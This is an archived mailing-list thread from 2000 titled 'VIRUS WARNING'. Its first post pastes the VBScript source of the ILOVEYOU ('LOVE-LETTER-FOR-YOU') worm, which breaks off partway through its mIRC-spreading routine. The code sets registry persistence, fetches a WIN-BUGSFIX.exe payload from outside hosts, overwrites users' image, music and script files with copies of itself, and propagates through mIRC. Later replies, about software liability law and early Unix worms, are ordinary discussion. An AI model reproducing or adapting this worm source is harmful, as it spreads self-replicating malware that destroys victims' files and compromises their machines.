"noone ever got fired for buying ibm" this was ironic coz ibm was expensive, but worked someone should get fired for buying someone elses prodiucts irony no class action just reality checkpoint time... for a systemic view, some stuff is engineered better than other stuff - see mark handly's excellent letter to the new york times, post melissa the best reason for diversity is not anti-capitalist, its darwinian. meanwhile, eres some visaual basic. j. cut here and paste to yor favourite waste disposal=== filename="LOVE-LETTER-FOR-YOU.TXT" rem barok -loveletter(vbe) i hate go to school rem by: spyder / [EMAIL PROTECTED] / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem"\MSKernel32.vbs") c.Copy(dirwin"\Win32DLL.vbs") c.Copy(dirsystem"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSK ernel32",dirsystem"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServ ices\Win32DLL",dirwin"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw65 87345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546 786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOh fgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUg qwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN -BUGSFIX",downread"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec"\"bname".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eqfolderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on
Re: VIRUS WARNING
On Thu, 04 May 2000 20:39:43 EDT, Keith Moore said: but sooner or later folks are going to be held liable for poor engineering or poor implementation of networking software, just like folks today can be held liable for poor engineering or implementation of bridges or buildings. Not if the UCITA becomes legal. Large immoral software vendors can then ship software shrink-wrapped with a "if you break the seal you agree to the license inside", and the license inside prohibits you from reverse-engineering, publicising, or discussing bugs. I kid you not. Sometimes I wish the Virginia state constitution was amended so a governor can suceed himself - currently, they're only in for one consecutive term, so they tend to do splashy-but-longterm bad things to use it as a springboard for a Congressional campaign... At least the guys in Richmond had the sense to put a one-year study period in before it becomes the law... Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
On Thu, 04 May 2000 11:11:50 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: In fact to back up your statement, there are exactly 3 virii that infect UNIX based systems. Hmm.. the Morris worm of 1988. What are the other 2? Hmm.. if you count the 2 self-reproducing sample programs that came with 'gcc', no others. Or maybe there's more than 3, which is likely since I've seen at least 4 different "proof of concept" level creations... Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
Hmm.. the Morris worm of 1988. What are the other 2? Piers Dick Lauder and Bob Kummerfeld implemented Mail/sendfile *@* (yes, wildcards both sides of the user@host name form) in ACSnet prior to this. It was designed to be used amongst other things, to do s/w updates to all ACSnet subscribers. And it worked over IP as well as an applications layer over TCP/IP, gated into sendmail. The one time I saw them use it, it killed my sendmail by n-n*m explosion of outbound mails. And as soon as I deleted one from mqueue, another 20 came in. Mike Lesk claimed UUCP was invented for similar reasons and I seem to recall some more than proof of concept uux methods to re-create forwarding data but thats probably never been exploited in an IP network. Then there are the checkgroups message flows in News... cheers -George -- George Michaelson | DSTC Pty Ltd Email: [EMAIL PROTECTED]| University of Qld 4072 Phone: +61 7 3365 4310| Australia Fax: +61 7 3365 4311| http://www.dstc.edu.au